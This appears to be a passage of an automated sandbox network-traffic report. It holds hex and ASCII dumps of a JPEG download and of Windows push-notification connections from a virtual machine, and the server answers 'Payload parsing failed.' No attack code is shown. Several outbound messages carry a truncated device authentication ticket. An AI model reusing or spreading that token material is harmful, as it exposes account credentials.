                                                                                                                                                                                                                  2024-12-18 20:06:25 UTC15528INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 31 31 20 30 30 3a 33 39 3a 30 38 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03
                                                                                                                                                                                                                  Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:11 00:39:088C
                                                                                                                                                                                                                  2024-12-18 20:06:25 UTC16384INData Raw: 5a 7a 8a 10 ad 71 11 6a 68 46 1a 9a a2 9f 1d 0c 39 4b 28 71 c5 59 86 5d ab 54 91 aa 45 6a 81 58 d0 86 7a d9 d1 2e 7f 78 b9 eb 5c da b9 15 72 da e4 27 4a 72 8e 82 bd 8f 41 b0 d4 63 5d bb de b5 d3 59 0c bb 12 bc d2 1b e7 dd f7 ab 63 4a be 05 72 cd cd 73 ca 8c 59 bc 71 12 48 ee e3 b9 12 71 2b 53 d3 9d db 1b 8a e6 ec ee d1 ba b5 6a 5a ce cb f3 07 f9 6b 27 0b 1d 11 a8 a4 8d 8d 3e e6 45 9b 61 fb b5 6a ea 40 cb 91 58 e9 72 36 f1 f7 a9 1a e4 d2 f6 6d b1 fb 54 91 3c cf 9f a5 56 76 40 ad 9a 8e 49 f3 55 ee 24 25 70 2b a2 2a c8 e5 94 db 63 2e a7 2a d8 56 e2 b3 6e 27 3b 79 ab 52 0d cb 54 66 84 9a 8b 2b 9a 39 69 62 94 d2 ee 6c d2 23 1e a6 9f 34 07 75 01 0f 7a b4 46 84 d6 d2 7c d5 6a 18 83 36 5a aa 40 31 25 5f b7 52 56 99 93 dc 64 91 54 32 42 36 fb d5 f5 46 35 1d c4 7f
                                                                                                                                                                                                                  Data Ascii: ZzqjhF9K(qY]TEjXz.x\r'JrAc]YcJrsYqHq+SjZk'>Eaj@Xr6mT<Vv@IU$%p+*c.*Vn';yRTf+9ibl#4uzF|j6Z@1%_RVdT2B6F5
                                                                                                                                                                                                                  2024-12-18 20:06:25 UTC16384INData Raw: da a6 65 a8 d8 51 70 18 d4 c6 1d c5 49 8f 6a 4d a6 a8 cc 87 14 63 d2 a6 d9 4e f2 7b d3 ba 02 be da 36 1a b4 b0 d4 89 6c c6 97 32 02 8f 96 d4 be 51 ad 48 6d 33 d6 ac c7 62 a7 f8 6a 5d 44 8a 51 6c c4 58 4d 3d 2d cf e1 5b 7f 63 1f dd a7 2d aa 8e 6a 7d a9 5e c9 f6 31 e3 b6 f9 b1 b6 ac 45 67 95 fb b5 a4 b0 01 fc 34 ef 2f 14 bd a0 d5 36 50 4b 2a 7a 5a 00 d5 77 6d 1d 28 e6 6c 7c 84 29 6e 05 2b 42 b5 2b b6 16 a3 66 a7 a9 2d 21 bb 00 a7 28 02 9a cd 4d f3 16 9d 89 e6 48 95 8d 37 3e f5 1f 99 4d 69 28 b3 1f 39 23 38 a6 b3 d4 4e e2 a2 79 29 93 76 4e f2 7e 55 13 cb 55 d9 c9 a6 b3 ff 00 7a 81 13 bc 95 1e fc d4 79 26 91 b9 a7 62 79 87 b3 fb d4 4c 69 d8 f6 a3 6e 7a d5 25 60 e6 1b 4d c6 6a 5d b4 32 8a 62 6e e4 5b 69 ac b8 a9 d8 52 63 da 81 11 6d a3 6d 3d b1 ba 8a 68 04 c7
                                                                                                                                                                                                                  Data Ascii: eQpIjMcN{6l2QHm3bj]DQlXM=-[c-j}^1Eg4/6PK*zZwm(l|)n+B+f-!(MH7>Mi(9#8Ny)vN~UUzy&byLinz%`Mj]2bn[iRcmm=h
                                                                                                                                                                                                                  2024-12-18 20:06:25 UTC16384INData Raw: a5 8d 73 d6 9c c9 4f 99 07 2b 18 c6 9a d4 ac 30 d4 98 cd 34 c4 d0 a8 33 4a c7 14 f5 52 23 a8 66 c8 5a 7c c3 e5 20 b8 98 ee aa cd 26 69 f7 15 52 46 23 f8 ab 58 a3 09 b7 72 6f 33 1f c5 49 e7 7b d5 66 73 49 9a d2 c8 c9 dd 16 bc da 46 96 ab 6e a4 66 a7 ca 85 76 4b 24 95 04 8f 44 87 35 13 1c d5 ec 1d 07 6f 3d 29 99 cd 23 1a 17 9a 09 77 12 4c 9e 2a 12 31 56 54 52 f9 41 ba d3 4e c2 e5 65 32 33 53 da c0 0f 2f 53 2c 02 a5 09 85 c0 a4 e7 d8 71 a7 a9 58 c1 18 6c d3 64 88 37 4f 96 ac b2 fc d4 d6 4a 4a 6c a7 08 90 c6 81 6a af 88 22 12 e8 b7 51 9f 94 49 11 1b b8 6e be c7 83 f4 3c 1a be c9 9a a5 e2 15 ff 00 89 0d e7 fd 72 34 aa 4b dc 65 d1 8f ef 23 ea 8d eb 6b ad 76 d3 54 9e 3d 4b 4c fe d3 8a cf c9 4b 49 b4 25 1f bb 8c db 12 c3 ec 8e 43 8c bc 89 c4 6c c1 3a 01 8a da d2
                                                                                                                                                                                                                  Data Ascii: sO+043JR#fZ| &iRF#Xro3I{fsIFnfvK$D5o=)#wL*1VTRANe23S/S,qXld7OJJlj"QIn<r4Ke#kvT=KLKI%Cl:
                                                                                                                                                                                                                  2024-12-18 20:06:26 UTC16384INData Raw: d4 29 93 75 b3 fb b9 3f ad 4c c8 e3 f8 bf f1 da 86 30 cd 74 d8 fe ef cd f9 d6 c6 17 26 6f 95 bd e8 dd 20 e6 36 db fe f5 35 84 a7 fd 5a ab 0f e2 dc db 7f 2a 19 8f 78 9a a8 63 98 dc 96 ff 00 55 0b ff 00 b5 b8 31 fd 69 51 c8 fb eb b4 ff 00 12 d4 79 2d fe ad 7c c3 fd da 44 33 b3 61 e3 91 17 fd 9c 33 7f f5 a9 31 13 28 8d 7e 41 f2 9f e1 a5 50 17 72 9e ab f7 6a 36 6d 9c 6d 68 c7 f7 9a a4 42 af b4 96 ff 00 be 5b f9 d0 c3 72 58 5b e5 c8 f9 4a f2 b5 e8 1f b3 a4 d0 2f c5 05 4d bb 5a 5d 3e 71 f2 af 70 63 3c ff 00 c0 6b ce dd 5d 17 7c 0d ca ff 00 0f f0 b0 ef 5d af c1 19 e0 b6 f8 ad a3 dc 85 65 17 4b 35 b3 2f 65 32 44 71 fa a5 71 63 e3 cd 85 a8 bc 99 d5 81 97 2e 26 9b f3 47 d0 f4 da 28 af 83 3e f2 c3 b1 4d a2 8a 02 c3 66 27 6f 15 06 48 ab 2e 33 51 ba d3 42 2b 34 6a f5
                                                                                                                                                                                                                  Data Ascii: )u?L0t&o 65Z*xcU1iQy-|D3a31(~APrj6mmhB[rX[J/MZ]>qpc<k]|]eK5/e2Dqqc.&G(>Mf'oH.3QB+4j
                                                                                                                                                                                                                  2024-12-18 20:06:26 UTC16384INData Raw: 1d 69 9f 35 19 f7 a6 43 24 c3 51 8f 6a 8f 3e f4 bb a8 0e 56 3e 9a c0 d3 77 51 ba 81 0b 83 49 85 a3 7d 23 35 00 18 a3 9a 33 49 5a 00 ec fb d2 66 92 8a 96 80 77 cd 45 26 29 28 40 3b 3e f4 d2 73 42 93 46 7d ea 92 44 97 34 15 df ab 40 0b 6d f9 bf a5 74 7a a2 18 ed d5 be 66 08 8c ee ab fc 5f 29 00 7e 75 89 e1 38 f7 ea 5e 69 6d a2 25 cb 55 cd 51 48 d3 ee 06 df 2c cc cd 1a 2a 7c a1 89 93 68 fc c5 71 e2 35 9a 47 66 1d 3e 56 73 b7 d6 1f 69 d3 e2 f3 d7 89 60 8a 41 12 fd e9 a4 32 6d 0b ec bf 76 b3 f5 b7 95 ed 5a de 46 ff 00 51 26 64 8a 35 da b1 86 c1 dd c7 1c 8a e8 26 8b 76 93 7d 24 9b 96 48 23 22 36 55 f9 95 21 c3 27 cb ef d7 de b9 6f 39 ef ed 5b 50 8e 58 e2 5b cb 19 67 f2 d9 b7 6e 8a 10 11 df 77 4e a7 03 de bb 30 ed bf 44 65 88 49 69 d5 9c 97 89 6e 0d bf 9e 2d f7
                                                                                                                                                                                                                  Data Ascii: i5C$Qj>V>wQI}#53IZfwE&)(@;>sBF}D4@mtzf_)~u8^im%UQH,*|hq5Gf>Vsi`A2mvZFQ&d5&v}$H#"6U!'o9[PX[gnwN0DeIin-
                                                                                                                                                                                                                  2024-12-18 20:06:26 UTC16384INData Raw: 9a 96 da 55 2b 26 cf 33 fd ed bf 76 9e bb 04 2b 89 ff 00 8b ee ed fb de 94 fb 89 44 33 6e 33 ee 2c bf 77 6f dd ff 00 26 a3 98 d6 37 7b b2 1b ab ac db c7 f7 a3 1f c2 bc 7e 14 c1 75 20 91 7f 78 db b6 fd dd bd aa 29 98 b6 e3 e7 ab 15 6f bd fc e9 63 0e f2 29 0c ab 4b 9a e4 7b d7 b2 27 84 79 91 c9 e6 ea 13 e5 b3 b9 bc b1 f8 d3 99 a3 3b 3f d2 67 55 5f ba b4 ef 9e 2d c1 ee 57 2c a3 f8 7e e8 a5 b7 39 8d 89 95 71 bb e6 6a 96 ec 6e a3 75 66 2a 98 23 e1 ee 64 62 dc fd df ba 29 21 28 db b6 ce ca bf c4 db 68 b9 94 b6 dc c9 bb 77 dd 55 5a 7c 39 8a 16 06 55 62 cb ff 00 01 f6 a7 7b 8a 29 26 24 ce 7c b5 2b 3b 47 b7 ee af bd 2c 26 76 9b fe 3f 9b 77 fb bf 76 98 cd 95 c7 9e b8 fe f7 de a9 95 f2 d1 e1 97 ef 0f 96 a2 e6 8a 2a d7 23 80 49 e6 4b be f1 9b fb d2 6d fc ea 79 1f 16
                                                                                                                                                                                                                  Data Ascii: U+&3v+D3n3,wo&7{~u x)oc)K{'y;?gU_-W,~9qjnuf*#db)!(hwUZ|9Ub{)&$|+;G,&v?wv*#IKmy
                                                                                                                                                                                                                  2024-12-18 20:06:26 UTC16069INData Raw: 46 55 d6 9e 5a 1a ea 8e 19 42 75 da 6b d3 3e 09 c7 bb c5 9a 2a 3f 55 8a 63 f8 88 de bc c6 3b db 39 19 71 3a e2 45 c2 ee ca b7 ad 7a 87 c0 d9 12 4f 17 68 ef 1f cc 36 4e 3f bb ff 00 2c de aa ae 8e 36 32 a4 b4 77 3d aa 08 d0 db a9 db 1e 3f eb 99 a7 08 e2 1c 9f 2f fe fd bd 49 6e 08 b7 5d ed ff 00 93 62 a0 d7 6f 0e 9b e1 fd 4b 54 0a cc 74 fb 29 ae 76 b5 de d5 6f 2d 0b 60 91 c8 ce 31 4e 5a b6 8e 98 7c 28 7a 47 1f 7f 2b ff 00 1f a1 92 20 df f2 c3 fe fa 7a f3 6b 3f 8d 49 24 96 76 f2 f8 33 54 7b ab e9 e1 b6 8a 2b 6d 5a 2d be 6c a4 2a 06 2e a3 6a e4 f2 7b 57 a9 32 4c ad b1 d6 75 6f e2 5f 31 1f 69 ee 32 38 6c 1e 33 de b3 71 6b 73 48 49 4b 63 9e f8 8c 23 1f 0c fc 47 b3 6e 7f b3 5b ee c8 5b f8 d2 be 52 f8 c9 15 b3 de 31 b9 69 e3 55 96 d4 ab 45 18 76 cf 96 fd 89 1c 57
                                                                                                                                                                                                                  Data Ascii: FUZBuk>*?Uc;9q:EzOh6N?,62w=?/In]boKTt)vo-`1NZ|(zG+ zk?I$v3T{+mZ-l*.j{W2Luo_1i28l3qksHIKc#Gn[[R1iUEvW
                                                                                                                                                                                                                  2024-12-18 20:06:26 UTC16384INData Raw: 3b 99 35 cf de dd dc 4b 27 94 d1 47 f2 c7 12 28 dc ec bc ed 5d de f9 e7 81 50 f8 f3 4d f0 55 f5 d3 5d bd 8d dd dc 92 b9 ff 00 4c 9e 6f 2c c6 46 18 9f 97 92 0f 4c 01 c5 7c c4 b1 15 e5 8a 94 6b cd b6 fb 6c bd 36 47 64 a4 e1 18 ca 3a 58 df f1 97 8b 34 c3 e1 7f 0e 5b 5a fd a7 ed 1a 62 de 47 3a 49 21 56 68 e7 ba f3 46 4a 91 90 14 fc c0 f7 15 67 c1 89 6b 77 0c b7 63 74 a1 7e f3 49 97 0d 9f bb b4 9c e6 bc f2 1b 5f 0e dd 5e 5a da 2c 97 30 2a e4 49 76 b3 ee 92 47 fb cb c9 e3 68 ef 8e be b5 da e9 da ed 8e 81 a5 5a d9 5e 49 0d f3 c1 02 89 6f ae 63 29 0d c3 13 d2 34 5e 54 6d ee 7f ad 7b 38 4c 55 1a 51 50 a8 b6 d1 68 73 cb 11 52 a3 6d b3 a8 6b fd 37 4f 68 ee 25 f2 2c c4 7f 77 cc 50 ad 91 8e dc d5 cd 3f 57 d3 b5 09 24 94 cf f6 89 64 6c aa db 61 99 bb 9c 01 e9 5c 76 bf
                                                                                                                                                                                                                  Data Ascii: ;5K'G(]PMU]Lo,FL|kl6Gd:X4[ZbG:I!VhFJgkwct~I_^Z,0*IvGhZ^Ioc)4^Tm{8LUQPhsRmk7Oh%,wP?W$dla\v
                                                                                                                                                                                                                  2024-12-18 20:06:26 UTC16384INData Raw: c1 fb c3 da bb a3 87 71 f7 9e e6 3c ad 2b 97 34 df 12 6a 16 16 2b 02 4a ae b6 d2 ef 91 55 57 6b 03 d8 77 e7 d6 b4 be c3 ac 6a 4a d7 57 1a ac 7f 32 93 14 bb 8f cb 9e 42 ed 1d 17 dc d7 37 7f 62 6d 95 c1 93 cd 66 40 fb e3 61 b3 1d bf fd 54 db 2b fb c8 ad 25 54 ba 95 7c cc 1f 95 b2 1b 68 e8 7e 82 b5 95 3e 65 78 58 3d 9f 37 c3 b9 a9 71 e6 9b 79 46 a2 bf 69 2b 20 0a ca a4 19 93 d5 5b af 5a af 75 a9 69 fe 5c 90 15 91 63 45 26 39 06 3c cd f8 c7 38 e1 81 f7 ad ad 26 d6 ea 25 93 50 96 5d df ba 0f bb 68 da d9 e4 73 5c 66 a3 ff 00 1f d2 81 0f 92 0b 9f dd ed c6 df c0 d5 d3 a7 7b dc a8 45 48 eb be 1f 79 f3 ea 96 76 77 aa ab 6d 24 82 46 de a4 2a 90 3e 5c e7 d7 1d 7d 2b af d6 7c 41 3d c5 f3 68 5f da ff 00 bb ba 65 49 1a 38 32 8a 01 cf 93 c7 3b 58 f1 f5 ae 07 4c d4 24 bd
                                                                                                                                                                                                                  Data Ascii: q<+4j+JUWkwjJW2B7bmf@aT+%T|h~>exX=7qyFi+ [Zui\cE&9<8&%P]hs\f{EHyvwm$F*>\}+|A=h_eI82;XL$


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  19192.168.2.64982020.198.118.190443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:28 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4b 6f 44 7a 4a 73 38 6b 59 30 53 58 76 71 55 71 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 38 34 33 36 64 38 64 61 35 63 33 61 39 64 37 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: KoDzJs8kY0SXvqUq.1Context: d8436d8da5c3a9d7
                                                                                                                                                                                                                  2024-12-18 20:06:28 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                  2024-12-18 20:06:28 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4b 6f 44 7a 4a 73 38 6b 59 30 53 58 76 71 55 71 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 38 34 33 36 64 38 64 61 35 63 33 61 39 64 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 46 79 53 6e 31 48 6a 30 63 66 72 4b 67 53 78 4c 50 69 62 37 61 54 72 6f 4b 42 63 2b 6d 73 57 42 47 34 42 43 71 6f 64 63 2b 43 75 62 77 63 63 61 62 4e 66 41 55 46 36 41 54 69 79 4a 6b 58 35 61 53 38 35 67 50 2b 36 6c 72 6a 73 6a 48 47 35 2b 32 4d 4a 75 52 4a 61 52 35 35 47 69 34 30 6b 78 37 69 71 37 69 4a 64 6d 54 2b 6c 7a
                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: KoDzJs8kY0SXvqUq.2Context: d8436d8da5c3a9d7<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
                                                                                                                                                                                                                  2024-12-18 20:06:28 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 4b 6f 44 7a 4a 73 38 6b 59 30 53 58 76 71 55 71 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 38 34 33 36 64 38 64 61 35 63 33 61 39 64 37 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: BND 3 CON\QOS 56MS-CV: KoDzJs8kY0SXvqUq.3Context: d8436d8da5c3a9d7
                                                                                                                                                                                                                  2024-12-18 20:06:28 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                  2024-12-18 20:06:28 UTC58INData Raw: 4d 53 2d 43 56 3a 20 32 2f 59 34 49 51 63 4d 43 30 53 55 70 50 4a 46 32 65 58 6f 77 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                  Data Ascii: MS-CV: 2/Y4IQcMC0SUpPJF2eXoww.0Payload parsing failed.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  20192.168.2.64983720.198.118.190443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:32 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 67 62 72 63 57 42 47 67 43 30 6d 4d 54 2b 53 6c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 63 31 63 36 64 66 63 39 31 36 38 65 31 32 36 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: gbrcWBGgC0mMT+Sl.1Context: 1c1c6dfc9168e126
                                                                                                                                                                                                                  2024-12-18 20:06:32 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                  2024-12-18 20:06:32 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 67 62 72 63 57 42 47 67 43 30 6d 4d 54 2b 53 6c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 63 31 63 36 64 66 63 39 31 36 38 65 31 32 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 46 79 53 6e 31 48 6a 30 63 66 72 4b 67 53 78 4c 50 69 62 37 61 54 72 6f 4b 42 63 2b 6d 73 57 42 47 34 42 43 71 6f 64 63 2b 43 75 62 77 63 63 61 62 4e 66 41 55 46 36 41 54 69 79 4a 6b 58 35 61 53 38 35 67 50 2b 36 6c 72 6a 73 6a 48 47 35 2b 32 4d 4a 75 52 4a 61 52 35 35 47 69 34 30 6b 78 37 69 71 37 69 4a 64 6d 54 2b 6c 7a
                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: gbrcWBGgC0mMT+Sl.2Context: 1c1c6dfc9168e126<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
                                                                                                                                                                                                                  2024-12-18 20:06:32 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 67 62 72 63 57 42 47 67 43 30 6d 4d 54 2b 53 6c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 63 31 63 36 64 66 63 39 31 36 38 65 31 32 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: gbrcWBGgC0mMT+Sl.3Context: 1c1c6dfc9168e126<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                  2024-12-18 20:06:32 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                  2024-12-18 20:06:32 UTC58INData Raw: 4d 53 2d 43 56 3a 20 7a 62 6e 4b 30 67 77 75 54 45 6d 2f 38 2f 4a 58 77 6f 4d 6a 6a 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                  Data Ascii: MS-CV: zbnK0gwuTEm/8/JXwoMjjw.0Payload parsing failed.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  21192.168.2.64986920.198.118.190443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:46 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 44 6d 58 4b 4e 2f 65 32 36 6b 79 38 6b 39 65 78 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 61 65 62 38 32 66 36 62 37 66 38 65 33 32 33 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: DmXKN/e26ky8k9ex.1Context: caeb82f6b7f8e323
                                                                                                                                                                                                                  2024-12-18 20:06:46 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
